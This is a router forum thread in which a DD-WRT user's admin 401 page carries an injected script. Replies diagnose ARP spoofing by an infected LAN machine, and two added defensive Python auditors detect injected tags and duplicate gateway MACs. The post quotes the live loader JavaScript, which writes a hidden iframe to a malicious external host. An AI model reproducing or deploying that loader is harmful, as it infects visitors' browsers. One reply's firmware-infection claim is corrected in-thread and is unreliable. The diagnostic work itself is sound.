Posted: Fri Oct 17, 2008 17:58 Post subject: Trojan/virus PC is infecting DD-WRT. Help
This has happened to me before, and I'm not sure how they are doing it. I have a WRT600N router flashed with dd-wrt svn build 10431. When I try to get onto a restricted page on the router (i.e. Administration) I rapidly get the pink screen that says:
Code:
Authorization required. please note that the default username is "root" in all newer releases
Analyzing its HTML code, it references another page to try to load a JavaScript:
Code:
<script language="javascript" SRC="http://sun.ads2008.info/vip.js"></script> <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>
The URL it tries to load is Status_Router.asp.
I can however still access the router via telnet and execute commands via the shell, but web access is unusable, and the page it redirects to tries to install malware if used with IE. Any idea how these trojans/viruses are infecting the DD-WRT? At first I thought it would be DNS poisoning, but this version already has the patched dnsmasq....
UPDATES:
* note: the admin password wasn't the default one.
** after analyzing the pages it takes you to, it takes you to a Japanese/Chinese server
Here's the HTML it outputs now (points to a different URL for the JavaScript)
Code:
<script language="javascript" type="text/javascript" src="http://vc.zaqaab.cn/vc.js"></script> <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>
The JavaScript content is
Code:
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleepv");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleepv=test;expires="+expires.toGMTString();
document.write("<iframe src=http://vc.zaqaab.cn/vc.htm width=50 height=0 border=0></iframe>");}
I have changed the default internal HTTP port to 8080, changed the default username (root) and password, disabled UPnP, SNMP, and all unnecessary services.
I'm running
Firmware: DD-WRT v24-sp2 (11/25/0 mega
on a Linksys WRT600N (since it was the last stable build for this unit).
I've tried different browsers and machines, and the same happens. Any other way to debug why it won't even let me log in to the router? (When I click on a tab, instead of asking me for the username/password it takes me directly to the pink 401 page with the infected JavaScript.)
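The poster's own analysis above boils down to two observable signs in the router's 401 response: something is prepended before the router's `<HTML>` tag, and that something loads a script from a host that is not the router. The following is an added example (not the poster's code and not part of DD-WRT) that checks a captured response body for exactly those two signs. The sample pages, the function names `audit_response`, `external_references` and `content_before_html_tag`, and the domain `malicious.example` are all constructed for the example; in practice the body would be captured with curl or a browser's network panel from the router's LAN address.

```python
import re
from urllib.parse import urlparse

# Constructed 401 page in the shape the poster quoted: an external script tag
# prepended before the router's own <HTML>. The domain is a placeholder.
INJECTED_401 = (
    '<script language="javascript" SRC="http://malicious.example/vc.js"></script> '
    '<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>\n'
    '<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>\n'
    'Authorization required. please note that the default username is "root" in all newer releases\n'
    '</BODY></HTML>'
)

# The same page as the router itself would serve it (constructed, unmodified).
CLEAN_401 = (
    '<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>\n'
    '<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>\n'
    'Authorization required. please note that the default username is "root" in all newer releases\n'
    '</BODY></HTML>'
)

# src= attribute of <script> and <iframe> tags, case-insensitive, quoted or not.
_SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
_IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def external_references(html, router_host):
    """Return script/iframe URLs in `html` whose host is not the router itself.
    A router admin page has no reason to pull code from the internet."""
    refs = []
    for pattern in (_SCRIPT_SRC, _IFRAME_SRC):
        for url in pattern.findall(html):
            host = urlparse(url).hostname
            if host and host != router_host:
                refs.append(url)
    return refs


def content_before_html_tag(html):
    """Return whatever precedes the first <html> tag (empty for a stock page).
    The poster's captures show the injected tag sitting exactly there."""
    m = re.search(r"<html\b", html, re.IGNORECASE)
    return html[:m.start()].strip() if m else html.strip()


def audit_response(html, router_host):
    """List human-readable findings; an empty list means nothing suspicious."""
    findings = []
    leading = content_before_html_tag(html)
    if leading:
        findings.append("content injected before <HTML>: " + leading[:80])
    for url in external_references(html, router_host):
        findings.append("loads external resource: " + url)
    return findings


if __name__ == "__main__":
    for name, body in (("clean", CLEAN_401), ("injected", INJECTED_401)):
        print(name, audit_response(body, "192.168.1.1") or "OK")
```

Running the audit from a second, known-clean machine (or from the router's own shell with wget, where the page is fetched without crossing the LAN) and comparing the two results is what separates "the router serves this" from "something on the path rewrites it", which is the question the thread is circling.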
The cause is a trojan horse (virus) on another computer in your network!
This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC, which forwards it to the internet and filters it in order to insert its malicious code.
You can find out which computer is the evil one by typing the following into your command line:
arp -a
In the table that appears, search for a doubly assigned physical address, one that is assigned once to the gateway IP address and once to another IP.
Find out which computer has the other IP and you will have the virus host.
Scan that one for viruses and malware (we are just about to conduct that scan).
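The check described in this reply (look at `arp -a`, find one physical address answering for both the gateway and another host) is easy to do by eye on a small LAN and tedious on a big one. Below is an added example, not code from the thread or from DD-WRT, that parses `arp -a` output in both the Windows and the Linux layout and reports any IP that shares the gateway's MAC. The sample tables, addresses and MACs are constructed for the example, and the function names `parse_arp_table`, `find_duplicate_macs` and `suspected_spoofers` are the example's own.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output in the Windows layout. The addresses are made up;
# 192.168.1.37 has taken over the gateway's MAC, the situation the reply describes.
WINDOWS_ARP_SAMPLE = """\
Interface: 192.168.1.100 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.37          00-1a-2b-3c-4d-5e     dynamic
  192.168.1.52          00-aa-bb-cc-dd-ee     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

# The same situation as Linux `arp -a` prints it (also constructed).
LINUX_ARP_SAMPLE = """\
_gateway (192.168.1.1) at 00:1a:2b:3c:4d:5e [ether] on eth0
? (192.168.1.37) at 00:1a:2b:3c:4d:5e [ether] on eth0
? (192.168.1.52) at 00:aa:bb:cc:dd:ee [ether] on eth0
"""

# An IPv4 address followed later on the same line by a MAC written with
# either ':' or '-' separators; this covers both layouts above.
_ENTRY = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?"
    r"(?P<mac>[0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})"
)


def parse_arp_table(text):
    """Return {ip: mac} with MACs normalized to lowercase, colon-separated."""
    table = {}
    for line in text.splitlines():
        m = _ENTRY.search(line)
        if not m:
            continue  # header lines, blank lines, "Interface:" lines
        table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table


def find_duplicate_macs(table):
    """Group IPs by MAC and keep only MACs that claim more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # The broadcast entry legitimately repeats and is not spoofing.
    return {mac: sorted(ips) for mac, ips in by_mac.items()
            if len(ips) > 1 and mac != "ff:ff:ff:ff:ff:ff"}


def suspected_spoofers(arp_output, gateway_ip):
    """IPs other than the gateway that share the gateway's MAC address.
    A non-empty result is the sign the reply describes."""
    table = parse_arp_table(arp_output)
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return []
    dups = find_duplicate_macs(table)
    return [ip for ip in dups.get(gw_mac, []) if ip != gateway_ip]


if __name__ == "__main__":
    import subprocess
    # Read the live table on this machine; fall back to the sample if arp is unavailable.
    try:
        live = subprocess.run(["arp", "-a"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        live = WINDOWS_ARP_SAMPLE
    for ip in suspected_spoofers(live, "192.168.1.1"):
        print(f"{ip} shares the gateway's MAC address: check that host for malware")
```

Run it on the affected PC with the real gateway address; the IP it prints is the machine to pull off the network and scan. A caveat: the table only shows what this PC has been told, so if the spoofer has stopped answering the entry will age out, and a clean result on one host does not clear the LAN.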
And I guess that the JS it injects makes something break on the DD-WRT, and that's why it responds with an invalid username/password.
Hi! Maybe you should change your antivirus. I use a version that gives me no problems and I really have no virus. So I recommend you use it. You can download it from here: kaspersky security 7
Joined: 24 Aug 2009 Posts: 2070 Location: South Florida
Posted: Tue Jun 01, 2010 12:07 Post subject:
Best A/V I have ever used is Avast. Not only is it free, but it will do a boot-time scan as well as screen saver scans...Great piece of software. Been using it for 3 years..
http://www.avast.com/index#tab2 _________________ Optware, the Right Way
Asus RT-AC68U
Asus RT-N66U
Asus RT-N10
Asus RT-N12
Asus RT-N16 x5
Asus WL520gU
Engenious ECB350
Linksys WRT600Nv1.1
Linksys WRT610Nv1
Linksys E2000
Netgear WNDR3300
SonicWall NSA220W
SonicWall TZ215W
SonicWall TZ205W
SonicWall TZ105W
Joined: 04 Jan 2007 Posts: 11564 Location: Wherever the wind blows- North America
Posted: Tue Jun 01, 2010 12:43 Post subject:
dave-levy wrote:
just to be clear here, does this occurrence mean the software is actually loaded into router memory, or is this purely a PC problem?
This is really an archaic post (2008)....but the way I understand it was if the PC is infected, then when you flashed the router, it injected the FW code with a virus....someone correct me if I am wrong.
So...by protecting your PC, you can also protect your router....there are other malware problems with router FWs....but BS had patched the FW to remedy this. Read the announcements about the Milworm Exploit. (it's in my recommended FW post)
redhawk _________________ The only stupid question....is the unasked one.
This is really an archaic post (2008)....but the way I understand it was if the PC is infected, then when you flashed the router, it injected the FW code with a virus....someone correct me if I am wrong.
No. It has nothing to do with DD-WRT. Another computer on the LAN spoofed the ARP entries of the gateway (in this case a DD-WRT router) and then proxied and modified all loaded HTML pages to infect more computers.
I'm not saying it's impossible, but it's very unlikely the DD-WRT itself is infected. Reading the way the OP is analyzing and drawing conclusions it becomes even less and less likely it has anything to do with DD-WRT. _________________ Asus RT16N + OTRW
Kingston 4GB USB-disk 128 MB swap + 1.4GB ext3 on /opt + 2 GB ext3 on /mnt
Copperjet 1616 modem in ZipB-config
Asterisk, pixelserv & Pound running on router
Another Asus RT16N as WDS-bridge